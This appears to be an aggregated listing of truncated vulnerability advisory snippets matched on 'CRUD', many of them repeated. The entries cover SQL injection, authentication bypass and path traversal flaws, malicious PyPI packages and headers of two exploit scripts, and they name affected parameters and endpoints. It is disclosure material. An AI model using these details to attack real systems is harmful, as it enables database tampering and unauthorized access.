CVE-2025-41029

SQL injection vulnerability in Zeon Academy Pro by Zeon Global Tech. This vulnerability allows an attacker to retrieve, create, update, and delete databases by sending a POST request using the parameter 'phonenumber' in '/private/continue-upload.php'...

EUVD-2025-28905

Malicious code in bioql PyPI...

EUVD-2021-32777

Malicious code in bioql PyPI...

CVE-2022-42744

CandidATS version 3.0.0 allows an external attacker to perform CRUD operations on the application databases. This is possible because the application does not correctly validate the entriesPerPage parameter against SQLi attacks...

Directus allows unauthenticated access to WebSocket events and operations

Summary When setting WEBSOCKETSGRAPHQLAUTH or WEBSOCKETSRESTAUTH to "public", an unauthenticated user is able to do any of the supported operations CRUD, subscriptions with full admin privileges. Details Accountability for unauthenticated WebSocket requests is set to null, which used to be "publi...

CVE-2023-38367

IBM Cloud Pak Foundational Services Identity Provider idP API IBM Cloud Pak for Automation 18.0.0, 18.0.1, 18.0.2, 19.0.1, 19.0.2, 19.0.3, 20.0.1, 20.0.2, 20.0.3, 21.0.1, 21.0.2, 21.0.3, 22.0.1, and 22.0.2 allows CRUD Operations with an invalid token. This could allow an unauthenticated attacker ...

CVE-2023-38367 IBM Cloud Pak for Automation authentication bypass

IBM Cloud Pak Foundational Services Identity Provider idP API IBM Cloud Pak for Automation 18.0.0, 18.0.1, 18.0.2, 19.0.1, 19.0.2, 19.0.3, 20.0.1, 20.0.2, 20.0.3, 21.0.1, 21.0.2, 21.0.3, 22.0.1, and 22.0.2 allows CRUD Operations with an invalid token. This could allow an unauthenticated attacker ...

CVE-2023-38367 IBM Cloud Pak for Automation authentication bypass

IBM Cloud Pak Foundational Services Identity Provider idP API IBM Cloud Pak for Automation 18.0.0, 18.0.1, 18.0.2, 19.0.1, 19.0.2, 19.0.3, 20.0.1, 20.0.2, 20.0.3, 21.0.1, 21.0.2, 21.0.3, 22.0.1, and 22.0.2 allows CRUD Operations with an invalid token. This could allow an unauthenticated attacker ...

PT-2024-12715 · Ibm · Ibm Cloud Pak Foundational Services Identity Provider

Name of the Vulnerable Software and Affected Versions: IBM Cloud Pak Foundational Services Identity Provider idP API versions 18.0.0 through 22.0.2 Description: The issue allows an unauthenticated attacker to perform CRUD operations using an invalid token, potentially enabling them to view, updat...

CVE-2024-1704

A vulnerability was found in ZhongBangKeJi CRMEB 5.2.2. It has been declared as critical. This vulnerability affects the function save/delete of the file /adminapi/system/crud. The manipulation leads to path traversal. The exploit has been disclosed to the public and may be used. The identifier o...

CRUD VS REST Explained

In the digital creation field, particularly web building, there exists two phrases that often become a riddle for neophytes and even seasoned coders: CRUD and REST. These pair of notions form the bedrock of knowledge in comprehending how information is tweaked and relayed across the World Wide We...

CVE-2022-42744

CandidATS version 3.0.0 allows an external attacker to perform CRUD operations on the application databases. This is possible because the application does not correctly validate the entriesPerPage parameter against SQLi attacks...

Design/Logic Flaw

CandidATS version 3.0.0 allows an external attacker to perform CRUD operations on the application databases. This is possible because the application does not correctly validate the entriesPerPage parameter against SQLi attacks...

CVE-2022-42744

CVE-2022-42744 affects CandidATS at version 3.0.0. The root cause is improper validation of the entriesPerPage parameter, enabling an external attacker to perform CRUD operations on the application databases via SQL injection. Impact is high: confidentiality, integrity, and availability are all c...

CVE-2022-42744

CandidATS version 3.0.0 allows an external attacker to perform CRUD operations on the application databases. This is possible because the application does not correctly validate the entriesPerPage parameter against SQLi attacks...

CVE-2022-42744

CandidATS version 3.0.0 allows an external attacker to perform CRUD operations on the application databases. This is possible because the application does not correctly validate the entriesPerPage parameter against SQLi attacks...

PT-2022-26534 · Candidats · Candidats

Name of the Vulnerable Software and Affected Versions: CandidATS version 3.0.0 Description: The issue allows an external attacker to perform CRUD operations on the application databases due to incorrect validation of the entriesPerPage parameter against SQL injection attacks. Recommendations: For...

ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File Modification

!/usr/bin/env python3 -- coding: utf-8 -- ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD Vendor: Industrial Control Links, Inc. Product web page: http://www.iclinks.com Product datasheet:...

Exploit for Missing Authorization in Vehicle_Service_Management_System_Project Vehicle_Service_Management_System

CVE-2021-46075 Exploit Title: Vehicle Service Management...

Sourcecodester Vehicle Service Management System Elevation of Privilege Vulnerability

Sourcecodester Vehicle Service Management System is an open source PHP project. A simple Web application for automotive repair/service stores or businesses. Sourcecodester Vehicle Service Management System has an elevation of privilege vulnerability that could be exploited by attackers to access...